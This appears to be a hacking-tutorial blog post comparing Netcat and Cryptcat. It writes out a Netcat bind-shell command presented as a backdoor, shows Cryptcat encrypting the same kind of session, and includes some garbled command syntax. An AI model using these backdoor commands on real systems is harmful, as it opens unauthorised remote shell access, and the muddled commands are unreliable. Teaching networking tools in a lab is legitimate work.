Tuesday, December 5, 2023

Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine

Netcat is a good build network debugging tool, which can read and write data across computers using TCP or UDP, it is also called TCP/IP utilities.

It is capable to act as a master and slave to do file transfer, TCP banner grabbing, backdoor shells, port scanners, port redirection, and network chats can also be performed using Netcat.

In this Kali Linux Tutorial how to work with Netcat and Cryptcat would show the difference between them.

Remote shell with Netcat:-

  • Execute Command: nc -l -p 1338 -e /bin/bash
  • The above listener will be listening via port 1338 and gives executable -e  for anyone for shell access through /bin/bash
  • Now, Kali Linux is a backdoor to your network.
  • Execute Command on Windows Machine :nc.exe <Kali linux Ip> <listening port >
  • The above-illustrated image shows the Windows machine or any client accessing and controlling Kali machine via Linux commands.


  • Execute Command in Kali Linux: nc -l -p 1337.
  • Above command, TCP session will be established to receive packets from any IP which connects to port 1337 & now your own private messenger is ready.
  • Execute Command in Windows machine: nc.exe <listener Ip address or Kali linux Ip>
  • The above image illustrates the listener over the 443 port & chat begins !!!
  • Here both the client and server are started chatting using Netcat. For More Functions & Commands Refer Here

Also Read Commix – Automated All-in-One OS Command Injection and Exploitation Tool

Note: Conversations between Kali Linux and Windows machines are encrypted or not ???? Let us check with Wireshark! 

Wireshark(packet capture Tool):-

  • OOPS !!!! Follow TCP Stream in Wireshark captures connections & clear text messages.OMG!
  • Anyone in your network can use Wireshark to see these activities.
  • But Still, we have an idea to overcome this issue. Let’s use ciphers!

Cryptcat(encrypting netcat):-

  • Cryptcat has an advanced feature like using ciphers to encrypt clear text communication.
  • Cryptcat uses end-to-end encryption using a Two-Fish encryption algorithm
  • Above comment executed : cryptcat -<lisener> <port> 8000
  • Cryptcat Commands will be the same as Netcat
  • Performed backdooring using Cryptcat, let’s check out the below Image of a chat session using Cryptcat.
  • So, we can see that the crypt cat encrypts the connection. It’s the most secure way of backdooring. Netcat is acquired by Nmap project and named as Ncat which supports SSL over Traffic. Cats are always Different. Happy Hacking !!!

Latest articles

Hackers Use Weaponized Documents to Attack U.S. Aerospace Industry

An American aerospace company has been the target of a commercial cyberespionage campaign dubbed...

Active Attacks Targeting Google Chrome & ownCloud Flaws: CISA Warns

The CISA announced two known exploited vulnerabilities active attacks targeting Google Chrome & own...

Cactus Ransomware Exploiting Qlik Sense code execution Vulnerability

A new Cactus Ransomware was exploited in the code execution vulnerability to Qlik Sense...

Hackers Bypass Antivirus with ScrubCrypt Tool to Install RedLine Malware

The ScrubCrypt obfuscation tool has been discovered to be utilized in attacks to disseminate the RedLine Stealer...

Hotel’s Booking.com Hacked Logins Let Attacker Steal Guest Credit Cards

According to a recent report by Secureworks, a well-planned and advanced phishing attack was...

Critical Zoom Vulnerability Let Attackers Take Over Meetings

Zoom, the most widely used video conferencing platform has been discovered with a critical...

Hackers Using Weaponized Invoice to Deliver LUMMA Malware

Hackers use weaponized invoices to exploit trust in financial transactions, embedding malware or malicious...

API Attack Simulation Webinar

Live API Attack Simulation

In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked.The session will cover:an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway

Related Articles